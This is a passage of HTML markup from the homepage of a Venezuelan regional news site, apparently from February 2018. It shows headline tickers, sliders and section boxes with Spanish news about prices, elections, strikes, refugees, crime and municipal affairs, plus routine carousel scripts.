                                    <li itemscope="" itemtype="http://schema.org/Article"><h4 itemprop="name"><span class="enotype-icon-arrow-right6"></span><a itemprop="url" href="http://diarioavance.com/?p=165426" rel="bookmark">El pollo aumentó 9.815% en un  año</a></h4></li>
                                    <li itemscope="" itemtype="http://schema.org/Article"><h4 itemprop="name"><span class="enotype-icon-arrow-right6"></span><a itemprop="url" href="http://diarioavance.com/?p=165430" rel="bookmark">Descubre la razón por la que Raúl de Molina se va de su casa</a></h4></li>
                                    <li itemscope="" itemtype="http://schema.org/Article"><h4 itemprop="name"><span class="enotype-icon-arrow-right6"></span><a itemprop="url" href="http://diarioavance.com/?p=165451" rel="bookmark">Presos cuatro funcionarios del Saime por chanchullos con pasaportes</a></h4></li>
                                    <li itemscope="" itemtype="http://schema.org/Article"><h4 itemprop="name"><span class="enotype-icon-arrow-right6"></span><a itemprop="url" href="http://diarioavance.com/?p=165456" rel="bookmark">Gobernación oficializó creación de empresa de transporte</a></h4></li>
                            </ul>
        </div>
	</div>	
           
            
    </div><!--inner-->
</div><!--breaking news-->
<script type="text/javascript">
jQuery(document).ready(function($) {
   //breaking news
	    $('body:not(.rtl) .breaking-cont ul.webticker').liScroll({travelocity: 0.06});
	    $('body.rtl .breaking-cont ul.webticker').liScrollRight({travelocity: 0.06});
	});
</script>                
                </header><!--Header-->
                

	<div class="main-container"><!--container-->
		        		
        
						 
					<div class="main-left"><!--Main Left-->
			            <div class="main-content" role="main"><!--Main Content-->
			        <div class="vc_row wpb_row vc_row-fluid">
	<div class="vc_col-sm-12 wpb_column vc_column_container">
		<div class="wpb_wrapper">
								 <!-- Default slider --> 
					
                            <section class="section"><!--def slider-->
                                <div class="def-slider">
                                    <div class="def-slider-wrap momizat-custom-slider mcs-93">
                                                                                                                        <div class="def-slider-item" itemscope="" itemtype="http://schema.org/Article">
                                            <a itemprop="url" href="http://diarioavance.com/?p=165426"><img class="appear" itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/precio-de-pollos--546x365.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/precio-de-pollos--765x510.jpg" alt="El pollo aumentó 9.815% en un  año"></a>
                                                                                        <div class="def-slider-cap">
                                                <div class="def-slider-title">
                                                    <h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165426">El pollo aumentó 9.815% en un  año</a></h2>
                                                </div>
                                                                                            </div>
                                                                                    </div>
                                                                                                                                                                <div class="def-slider-item" itemscope="" itemtype="http://schema.org/Article">
                                            <a itemprop="url" href="http://diarioavance.com/?p=165451"><img class="appear" itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/foto-1-546x365.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/foto-1-765x510.jpg" alt="Presos cuatro funcionarios del Saime por chanchullos con pasaportes"></a>
                                                                                        <div class="def-slider-cap">
                                                <div class="def-slider-title">
                                                    <h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165451">Presos cuatro funcionarios del Saime por chanchullos con pasaportes</a></h2>
                                                </div>
                                                                                            </div>
                                                                                    </div>
                                                                                                                                                                <div class="def-slider-item" itemscope="" itemtype="http://schema.org/Article">
                                            <a itemprop="url" href="http://diarioavance.com/?p=165350"><img class="appear" itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/conviasa017.jpg_1498382173-546x365.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/conviasa017.jpg_1498382173.jpg" alt="Trabajadores de Conviasa paralizarán sus actividades para exigir pago de pasivos laborales"></a>
                                                                                        <div class="def-slider-cap">
                                                <div class="def-slider-title">
                                                    <h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165350">Trabajadores de Conviasa paralizarán sus actividades para exigir pago de pasivos laborales</a></h2>
                                                </div>
                                                                                            </div>
                                                                                    </div>
                                                                                                                                                                <div class="def-slider-item" itemscope="" itemtype="http://schema.org/Article">
                                            <a itemprop="url" href="http://diarioavance.com/?p=165342"><img class="appear" itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/plaza-3-546x365.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/plaza-3-765x500.jpg" alt="Metro de Caracas informó que la estación Plaza Venezuela restableció el servicio comercial"></a>
                                                                                        <div class="def-slider-cap">
                                                <div class="def-slider-title">
                                                    <h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165342">Metro de Caracas informó que la estación Plaza Venezuela restableció el servicio comercial</a></h2>
                                                </div>
                                                                                            </div>
                                                                                    </div>
                                                                                                                                                                <div class="def-slider-item" itemscope="" itemtype="http://schema.org/Article">
                                            <a itemprop="url" href="http://diarioavance.com/?p=165288"><img class="appear" itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/Protesta-San-Pedro-546x365.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/Protesta-San-Pedro-765x510.jpg" alt="Protestan por falta de CLAP"></a>
                                                                                        <div class="def-slider-cap">
                                                <div class="def-slider-title">
                                                    <h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165288">Protestan por falta de CLAP</a></h2>
                                                </div>
                                                                                            </div>
                                                                                    </div>
                                                                                                                    </div>
                                
                                </div>
                            </section><!--def slider-->
			    <script>
				jQuery(document).ready(function($) {
					var rtl = false;
									//Slider
				$('.mcs-93').owlCarousel({
					animateOut: '',
					animateIn: '',
					autoplay:true,
					autoplayTimeout:4000,
					autoplayHoverPause:false,
					autoHeight:true,
					rtl: rtl,
					loop: true,
					items:1,
					nav: true,
					 navText: ['<span class="enotype-icon-arrow-left7"></span>',
						'<span class="enotype-icon-uniE6D8"></span>'
					],
					smartSpeed:1000,
				});
			      });
			    </script>
                <!-- End Slider type -->             	
			<div class="mom-ads-wrap">
	<div class="mom-ads " style="">
		<div class="mom-ads-inner">
		
				<div class="mom-ad" data-id="37751" style="width:728px; height:90px; ">
					<a href="#http://diarioavance.com/wp-content/uploads/2015/01/Automercado-Express-animado1.gif" target=""><img src="http://diarioavance.com/wp-content/uploads/2015/01/Automercado-Express-animado1.gif" alt="Banner pequ"></a>
		 	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
        <script>
            jQuery(document).ready(function($) {
             //Scroller
	                  $(".sw-13").owlCarousel({
              autoplay:true,
		autoplayTimeout:3000,
              slideSpeed : 300,
			                items : 4,
              lazyLoad : true,
              /* itemsScaleUp: true, */
              navigation : true,
              /* loop:true, */
		//autoWidth:true,
		autoHeight:         true,
			  margin: 1,
			  nav:true,
			  responsiveClass:true,
              responsive:{
                  1024:{
	                  items:4,
                  },
                  970:{
		            	items:4  
	              },	
              	  795:{
		            	items:2  
	              },
		  678:{
		            	items:2  
	              },
	              567:{
		            	items:2  
	              },
	              450:{
		            	items:1  
	              },
	              360:{
		            	items:1  
	              },
	              320:{
		            	items:1  
	              },
              }
            });
            
	                
          });
        </script>
                
                                                
                    <section class="section scroller-section">
                        
                        <header class="section-header">
                        	                            <h2 class="section-title">Ultima Hora</h2>
                                                                                </header>
                        
                        <div class="scroller">
                            <ul class="scroller-wrap sw-13">
                                                                <li class="scroller-item" itemscope="" itemtype="http://schema.org/Article">
                                    <a itemprop="url" href="http://diarioavance.com/?p=165226">
                                        <figure class="post-thumbnail"><img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/42bcf272-1e22-4664-b7a5-88dfbc24e592-274x183.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/42bcf272-1e22-4664-b7a5-88dfbc24e592.jpg" alt="Adolescente embarazada falleció al caer de una mata de mango"></figure>
                                        <h2 itemprop="name">Adolescente embarazada falleció al caer de una mata de mango</h2>
                                                                                <div class="entry-meta">
                                            					    					    					    <div class="cat-link">
                                                <i class="momizat-icon-folder-open"></i><a class="category" href="http://diarioavance.com/?cat=21">Ultima Hora</a>                                            </div>
					                                            </div>
                                                                            </a>
                                </li>
                                                                <li class="scroller-item" itemscope="" itemtype="http://schema.org/Article">
                                    <a itemprop="url" href="http://diarioavance.com/?p=165095">
                                        <figure class="post-thumbnail"><img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/2-274x183.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/2-765x510.jpg" alt="Se ahorcó dentro de su vivienda en la calle Sucre"></figure>
                                        <h2 itemprop="name">Se ahorcó dentro de su vivienda en la calle Sucre</h2>
                                                                                <div class="entry-meta">
                                            					    					    					    <div class="cat-link">
                                                <i class="momizat-icon-folder-open"></i><a class="category" href="http://diarioavance.com/?cat=21">Ultima Hora</a>                                            </div>
					                                            </div>
                                                                            </a>
                                </li>
                                                                <li class="scroller-item" itemscope="" itemtype="http://schema.org/Article">
                                    <a itemprop="url" href="http://diarioavance.com/?p=165006">
                                        <figure class="post-thumbnail"><img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/foto-1-274x183.png" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/foto-1.png" alt="Se resistió al robo y le dispararon"></figure>
                                        <h2 itemprop="name">Se resistió al robo y le dispararon</h2>
                                                                                <div class="entry-meta">
                                            					    					    					    <div class="cat-link">
                                                <i class="momizat-icon-folder-open"></i><a class="category" href="http://diarioavance.com/?cat=71">Titulares</a>                                            </div>
					                                            </div>
                                                                            </a>
                                </li>
                                                                <li class="scroller-item" itemscope="" itemtype="http://schema.org/Article">
                                    <a itemprop="url" href="http://diarioavance.com/?p=164941">
                                        <figure class="post-thumbnail"><img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/Foto0-1-274x183.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/Foto0-1-765x501.jpg" alt="Lo hallaron muerto y sin piernas"></figure>
                                        <h2 itemprop="name">Lo hallaron muerto y sin piernas</h2>
                                                                                <div class="entry-meta">
                                            					    					    					    <div class="cat-link">
                                                <i class="momizat-icon-folder-open"></i><a class="category" href="http://diarioavance.com/?cat=71">Titulares</a>                                            </div>
					                                            </div>
                                                                            </a>
                                </li>
                                                                <li class="scroller-item" itemscope="" itemtype="http://schema.org/Article">
                                    <a itemprop="url" href="http://diarioavance.com/?p=164886">
                                        <figure class="post-thumbnail"><img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/unnamed-1-274x183.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/unnamed-1-765x510.jpg" alt="Muere agricultor en accidente"></figure>
                                        <h2 itemprop="name">Muere agricultor en accidente</h2>
                                                                                <div class="entry-meta">
                                            					    					    					    <div class="cat-link">
                                                <i class="momizat-icon-folder-open"></i><a class="category" href="http://diarioavance.com/?cat=71">Titulares</a>                                            </div>
					                                            </div>
                                                                            </a>
                                </li>
                                                                <li class="scroller-item" itemscope="" itemtype="http://schema.org/Article">
                                    <a itemprop="url" href="http://diarioavance.com/?p=164703">
                                        <figure class="post-thumbnail"><img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/01/Foto-1-274x183.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/01/Foto-1-765x510.jpg" alt="Cae abatido choro en enfrentamiento con el Cicpc Cae abatido choro en enfrentamiento con el Cicpc"></figure>
                                        <h2 itemprop="name">Cae abatido choro en enfrentamiento con el Cicpc Cae abatido choro en enfrentamiento con el Cicpc</h2>
                                                                                <div class="entry-meta">
                                            					    					    					    <div class="cat-link">
                                                <i class="momizat-icon-folder-open"></i><a class="category" href="http://diarioavance.com/?cat=71">Titulares</a>                                            </div>
					                                            </div>
                                                                            </a>
                                </li>
                                                            </ul>
                        </div>
                        
                    </section>
                	
	<div class="wpb_single_image wpb_content_element wpb_animate_when_almost_visible wpb_left-to-right vc_align_left">
		<div class="wpb_wrapper">
			
			<a href="http://diarioavance.com/clasificados-avance/" target="_self"><img class="" src="" width="" height="" alt="" /></a>
		</div> 
	</div>                     
            	    
		<section class="section news-box nb1 cat_29"><!--News box 1-->
			                                    
                            <header class="block-title">
                                <h2><a href="http://diarioavance.com/?cat=29">Tema del día</a></h2>
				                            </header>
                            
                            <ul>
                                                                <li class="post-165350 post type-post status-publish format-standard has-post-thumbnail category-tema-del-dia category-temas-del-dia tag-pasivos-laborales tag-trabajadores-de-conviasa-paralizaran-sus-actividades-para-exigir-pago-de pmpro-has-access" itemscope="" itemtype="http://schema.org/Article">
                                                                        <figure class="post-thumbnail"><a href="http://diarioavance.com/?p=165350">
                                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/conviasa017.jpg_1498382173-364x245.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/conviasa017.jpg_1498382173.jpg" alt="Trabajadores de Conviasa paralizarán sus actividades para exigir pago de pasivos laborales">
                                        <span class="post-format-icon"></span>
                                    </a></figure>
                                                                        									<div class="fix-right-content">
                                    <h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165350">Trabajadores de Conviasa paralizarán sus actividades para exigir pago de pasivos laborales</a></h2>
                                    <div class="entry-content">
                                        
                                        <p>
	                                        Los trabajadores de la aerolínea Conviasa decidieron declarar la “hora cero y paralizar sus actividades” a partir d...	                                    </p>
	                                                                    </div>
                                                                     <div class="entry-meta">
                                                                                                                </div>
                                    									</div>                                </li>
                                                                <li class="post-165342 post type-post status-publish format-standard has-post-thumbnail category-tema-del-dia category-temas-del-dia pmpro-has-access" itemscope="" itemtype="http://schema.org/Article">
                                                                        <figure class="post-thumbnail"><a href="http://diarioavance.com/?p=165342">
                                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/plaza-3-364x245.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/plaza-3-765x500.jpg" alt="Metro de Caracas informó que la estación Plaza Venezuela restableció el servicio comercial">
                                        <span class="post-format-icon"></span>
                                    </a></figure>
                                                                        									<div class="fix-right-content">
                                    <h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165342">Metro de Caracas informó que la estación Plaza Venezuela restableció el servicio comercial</a></h2>
                                    <div class="entry-content">
                                        
                                        <p>
	                                        La mañana de este lunes fue suspendido el servicio comercial en la estación Plaza Venezuela motivado a un maletín a...	                                    </p>
	                                                                    </div>
                                                                     <div class="entry-meta">
                                                                                                                </div>
                                    									</div>                                </li>
                                                            </ul>
                                                    
                    </section><!--News box 1-->
		
	    
	                    
                        
                    <section class="section news-box cat_8"><!--News box 3-->
                                
                        <header class="block-title">
                            <h2><a href="http://diarioavance.com/?cat=8">En el país</a></h2>
				                            <ol class="nb-tabbed-head" data-nbs="nb3" data-number_of_posts="2" data-orderby="" data-nb_excerpt="">
                                <li class="all active"><a href="#" data-cat_id="" data-parent_cat="8">Todas</a></li>
				                            </ol>
                        </header>
                        
                        <div class="nb3">
                                                        <div class="first-item post-165423 post type-post status-publish format-standard has-post-thumbnail category-en-el-pais tag-cne tag-henry-falcon pmpro-has-access" role="article" itemscope="" itemtype="http://schema.org/Article">
                                                                <figure class="post-thumbnail"><a href="http://diarioavance.com/?p=165423">
                                    <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/LH10zLM_-364x245.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/LH10zLM_.jpg" alt="Henri Falcón formalizó su candidatura ante el CNE para elecciones presidenciales">
                                    <span class="post-format-icon"></span>
                                </a></figure>
                                                                                                <div class="fix-right-content">
                                <h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165423">Henri Falcón formalizó su candidatura ante el CNE para elecciones presidenciales</a></h2>
                                <div class="entry-content">
                                  
                                    <p>
	                                        El dirigente de Avanzada Progresista, Henri Falcón, formaliza este martes su candidatura ante las autoridades del C...	                                    </p>
	                                                            </div>
                                                                <div class="entry-meta">
                                	                                                                    </div>
                                                                </div>
                            </div>
                                                        <div class="first-item post-165420 post type-post status-publish format-standard has-post-thumbnail category-en-el-pais tag-cne tag-electoral pmpro-has-access" role="article" itemscope="" itemtype="http://schema.org/Article">
                                                                <figure class="post-thumbnail"><a href="http://diarioavance.com/?p=165420">
                                    <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/1225be182745490b85d26b5fcdf7ad44-364x245.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/1225be182745490b85d26b5fcdf7ad44-765x476.jpg" alt="Proceso de impugnación al Registro Electoral para las presidenciales culmina este martes">
                                    <span class="post-format-icon"></span>
                                </a></figure>
                                                                                                <div class="fix-right-content">
                                <h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165420">Proceso de impugnación al Registro Electoral para las presidenciales culmina este martes</a></h2>
                                <div class="entry-content">
                                  
                                    <p>
	                                        El lapso de presentación de "eventuales impugnaciones" al Registro Electoral Preliminar concluye este martes, según...	                                    </p>
	                                                            </div>
                                                                <div class="entry-meta">
                                	                                                                    </div>
                                                                </div>
                            </div>
                                                        
                            <ul>
                                                                <li role="article" itemscope="" itemtype="http://schema.org/Article">
                                                                        <figure class="post-thumbnail"><a href="http://diarioavance.com/?p=165372">
                                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/2-2-80x54.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/2-2-765x477.jpg" alt="PJ y AD no irían a las presidenciales ">
                                    </a></figure>
                                                                        <h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165372">PJ y AD no irían a las presidenciales </a></h2>
                                                                        <div class="entry-meta">
                                    	                                                                            </div>
                                                                    </li>
                                                                <li role="article" itemscope="" itemtype="http://schema.org/Article">
                                                                        <figure class="post-thumbnail"><a href="http://diarioavance.com/?p=165364">
                                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/noticia-nicolas-maduro-80x54.png" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/noticia-nicolas-maduro.png" alt="Cancillería: Maduro asistirá puntualmente a Lima ">
                                    </a></figure>
                                                                        <h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165364">Cancillería: Maduro asistirá puntualmente a Lima </a></h2>
                                                                        <div class="entry-meta">
                                    	                                                                            </div>
                                                                    </li>
                                                            </ul>
                        </div>
                        
                                                
                    </section><!--News box 3-->
                    
            
	                    
                        
                    <section class="section news-box cat_7"><!--News box 3-->
                                
                        <header class="block-title">
                            <h2><a href="http://diarioavance.com/?cat=7">En el mundo</a></h2>
				                            <ol class="nb-tabbed-head" data-nbs="nb3" data-number_of_posts="2" data-orderby="" data-nb_excerpt="">
                                <li class="all active"><a href="#" data-cat_id="" data-parent_cat="7">Todas</a></li>
				                            </ol>
                        </header>
                        
                        <div class="nb3">
                                                        <div class="first-item post-165440 post type-post status-publish format-standard has-post-thumbnail category-en-el-mundo tag-aumento tag-brasil tag-centroamerica tag-colombia tag-crisis tag-refugiados tag-venezolanos pmpro-has-access" role="article" itemscope="" itemtype="http://schema.org/Article">
                                                                <figure class="post-thumbnail"><a href="http://diarioavance.com/?p=165440">
                                    <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/a7aa1af08cfb4d07aab7e94cea9fd45f-364x245.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/a7aa1af08cfb4d07aab7e94cea9fd45f-765x477.jpg" alt="Aumento de refugiados venezolanos en Centroamérica preocupa a ACNUR">
                                    <span class="post-format-icon"></span>
                                </a></figure>
                                                                                                <div class="fix-right-content">
                                <h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165440">Aumento de refugiados venezolanos en Centroamérica preocupa a ACNUR</a></h2>
                                <div class="entry-content">
                                  
                                    <p>
	                                        La Oficina del Alto Comisionado de las Naciones Unidas para los Refugiados (ACNUR) analizó un incremento "preocupan...	                                    </p>
	                                                            </div>
                                                                <div class="entry-meta">
                                	                                                                    </div>
                                                                </div>
                            </div>
                                                        <div class="first-item post-165437 post type-post status-publish format-standard has-post-thumbnail category-en-el-mundo tag-brujo tag-campana tag-digital tag-jefe tag-reeleccion tag-trump pmpro-has-access" role="article" itemscope="" itemtype="http://schema.org/Article">
                                                                <figure class="post-thumbnail"><a href="http://diarioavance.com/?p=165437">
                                    <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/f74da4827eb043f6a0c03972b5669462-364x245.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/f74da4827eb043f6a0c03972b5669462-765x477.jpg" alt="Trump elige su &#8220;brujo digital&#8221; como jefe de campaña para su reelección">
                                    <span class="post-format-icon"></span>
                                </a></figure>
                                                                                                <div class="fix-right-content">
                                <h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165437">Trump elige su &#8220;brujo digital&#8221; como jefe de campaña para su reelección</a></h2>
                                <div class="entry-content">
                                  
                                    <p>
	                                        Donald Trump mira continuamente hacia el 2020. Cada paso que da, aunque chirríe, tiene como objetivo repetir mandat...	                                    </p>
	                                                            </div>
                                                                <div class="entry-meta">
                                	                                                                    </div>
                                                                </div>
                            </div>
                                                        
                            <ul>
                                                                <li role="article" itemscope="" itemtype="http://schema.org/Article">
                                                                        <figure class="post-thumbnail"><a href="http://diarioavance.com/?p=165433">
                                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/894175375688418e822a3af228974334-80x54.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/894175375688418e822a3af228974334-765x477.jpg" alt="Fallecidos al caer del tren de aterrizaje de un avión en Ecuador eran menores">
                                    </a></figure>
                                                                        <h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165433">Fallecidos al caer del tren de aterrizaje de un avión en Ecuador eran menores</a></h2>
                                                                        <div class="entry-meta">
                                    	                                                                            </div>
                                                                    </li>
                                                                <li role="article" itemscope="" itemtype="http://schema.org/Article">
                                                                        <figure class="post-thumbnail"><a href="http://diarioavance.com/?p=165398">
                                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/0001276438-80x54.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/0001276438-765x429.jpg" alt="Decreto de intervención militar es votado este lunes en Brasil">
                                    </a></figure>
                                                                        <h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165398">Decreto de intervención militar es votado este lunes en Brasil</a></h2>
                                                                        <div class="entry-meta">
                                    	                                                                            </div>
                                                                    </li>
                                                            </ul>
                        </div>
                        
                                                
                    </section><!--News box 3-->
                    
            
	                    
                        
                    <section class="section news-box cat_9161"><!--News box 3-->
                                
                        <header class="block-title">
                            <h2><a href="http://diarioavance.com/?cat=9161">Estadal</a></h2>
				                            <ol class="nb-tabbed-head" data-nbs="nb3" data-number_of_posts="2" data-orderby="" data-nb_excerpt="">
                                <li class="all active"><a href="#" data-cat_id="" data-parent_cat="9161">Todas</a></li>
				                            </ol>
                        </header>
                        
                        <div class="nb3">
                                                        <div class="first-item post-165456 post type-post status-publish format-standard has-post-thumbnail category-estadal tag-gobernacion tag-transporte pmpro-has-access" role="article" itemscope="" itemtype="http://schema.org/Article">
                                                                <figure class="post-thumbnail"><a href="http://diarioavance.com/?p=165456">
                                    <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/2609yutong630-1-364x245.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/2609yutong630-1.jpg" alt="Gobernación oficializó creación de empresa de transporte">
                                    <span class="post-format-icon"></span>
                                </a></figure>
                                                                                                <div class="fix-right-content">
                                <h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165456">Gobernación oficializó creación de empresa de transporte</a></h2>
                                <div class="entry-content">
                                  
                                    <p>
	                                         “Sabemos los problemas por los cuales atraviesan nuestros mirandinos. Nos encontramos en todas las gestiones admin...	                                    </p>
	                                                            </div>
                                                                <div class="entry-meta">
                                	                                                                    </div>
                                                                </div>
                            </div>
                                                        <div class="first-item post-165265 post type-post status-publish format-standard has-post-thumbnail category-estadal tag-copei tag-enrique-mendoza pmpro-has-access" role="article" itemscope="" itemtype="http://schema.org/Article">
                                                                <figure class="post-thumbnail"><a href="http://diarioavance.com/?p=165265">
                                    <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/imgres.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/imgres.jpg" alt="Mendoza: Si las presidenciales se dan sin condiciones está en peligro el hilo constitucional">
                                    <span class="post-format-icon"></span>
                                </a></figure>
                                                                                                <div class="fix-right-content">
                                <h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165265">Mendoza: Si las presidenciales se dan sin condiciones está en peligro el hilo constitucional</a></h2>
                                <div class="entry-content">
                                  
                                    <p>
	                                        Enrique Mendoza, ex gobernador de Miranda y dirigente de Copei	                                    </p>
	                                                            </div>
                                                                <div class="entry-meta">
                                	                                                                    </div>
                                                                </div>
                            </div>
                                                        
                            <ul>
                                                                <li role="article" itemscope="" itemtype="http://schema.org/Article">
                                                                        <figure class="post-thumbnail"><a href="http://diarioavance.com/?p=165215">
                                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/IMG_1418-80x54.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/IMG_1418-765x510.jpg" alt="Bomberos salienses trabajan sin camión para extinguir incendios">
                                    </a></figure>
                                                                        <h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165215">Bomberos salienses trabajan sin camión para extinguir incendios</a></h2>
                                                                        <div class="entry-meta">
                                    	                                                                            </div>
                                                                    </li>
                                                                <li role="article" itemscope="" itemtype="http://schema.org/Article">
                                                                        <figure class="post-thumbnail"><a href="http://diarioavance.com/?p=165109">
                                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/Permiso-de-viaje-1-80x54.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/Permiso-de-viaje-1.jpg" alt="Activan operativo para permisos de viaje en Carrizal">
                                    </a></figure>
                                                                        <h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165109">Activan operativo para permisos de viaje en Carrizal</a></h2>
                                                                        <div class="entry-meta">
                                    	                                                                            </div>
                                                                    </li>
                                                            </ul>
                        </div>
                        
                                                
                    </section><!--News box 3-->
                    
            
	                    
                        
                    <section class="section news-box cat_4"><!--News box 3-->
                                
                        <header class="block-title">
                            <h2><a href="http://diarioavance.com/?cat=4">Municipales</a></h2>
				                            <ol class="nb-tabbed-head" data-nbs="nb3" data-number_of_posts="2" data-orderby="" data-nb_excerpt="">
                                <li class="all active"><a href="#" data-cat_id="" data-parent_cat="4">Todas</a></li>
				                            </ol>
                        </header>
                        
                        <div class="nb3">
                                                        <div class="first-item post-165365 post type-post status-publish format-standard has-post-thumbnail category-municipales tag-concejo-municipal tag-liliana-espitia tag-los-salias pmpro-has-access" role="article" itemscope="" itemtype="http://schema.org/Article">
                                                                <figure class="post-thumbnail"><a href="http://diarioavance.com/?p=165365">
                                    <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/Spitia-364x245.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/Spitia-765x510.jpg" alt="Cámara Municipal de Los Salias negó permiso para construir en zona industrial">
                                    <span class="post-format-icon"></span>
                                </a></figure>
                                                                                                <div class="fix-right-content">
                                <h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165365">Cámara Municipal de Los Salias negó permiso para construir en zona industrial</a></h2>
                                <div class="entry-content">
                                  
                                    <p>
	                                        Liliana Espitia, vicepresidente del Concejo Municipal	                                    </p>
	                                                            </div>
                                                                <div class="entry-meta">
                                	                                                                    </div>
                                                                </div>
                            </div>
                                                        <div class="first-item post-165361 post type-post status-publish format-standard has-post-thumbnail category-municipales tag-liliana-espitia tag-los-salias pmpro-has-access" role="article" itemscope="" itemtype="http://schema.org/Article">
                                                                <figure class="post-thumbnail"><a href="http://diarioavance.com/?p=165361">
                                    <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/los-salias-364x245.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/los-salias.jpg" alt="Recolección de basura en  Los Salias se mantiene con fallas">
                                    <span class="post-format-icon"></span>
                                </a></figure>
                                                                                                <div class="fix-right-content">
                                <h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165361">Recolección de basura en  Los Salias se mantiene con fallas</a></h2>
                                <div class="entry-content">
                                  
                                    <p>
	                                        Espitia planteará que la Alcaldía se encargue de contratar los camiones compactadores	                                    </p>
	                                                            </div>
                                                                <div class="entry-meta">
                                	                                                                    </div>
                                                                </div>
                            </div>
                                                        
                            <ul>
                                                                <li role="article" itemscope="" itemtype="http://schema.org/Article">
                                                                        <figure class="post-thumbnail"><a href="http://diarioavance.com/?p=165357">
                                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2018/02/IMG-20180218-WA0016-80x54.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2018/02/IMG-20180218-WA0016-765x510.jpg" alt="Atención al Ciudadano atiende  alrededor de 100 solicitudes diarias">
                                    </a></figure>
                                                                        <h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165357">Atención al Ciudadano atiende  alrededor de 100 solicitudes diarias</a></h2>
                                                                        <div class="entry-meta">
                                    	                                                                            </div>
                                                                    </li>
                                                                <li role="article" itemscope="" itemtype="http://schema.org/Article">
                                                                        <figure class="post-thumbnail"><a href="http://diarioavance.com/?p=165354">
                                        <img itemprop="image" src="http://diarioavance.com/wp-content/uploads/2015/10/losteques1-80x54.jpg" data-hidpi="http://diarioavance.com/wp-content/uploads/2015/10/losteques1-765x510.jpg" alt="Gobierno local recuperará el  casco histórico de Los Teques">
                                    </a></figure>
                                                                        <h2 itemprop="name"><a itemprop="url" href="http://diarioavance.com/?p=165354">Gobierno local recuperará el  casco histórico de Los Teques</a></h2>
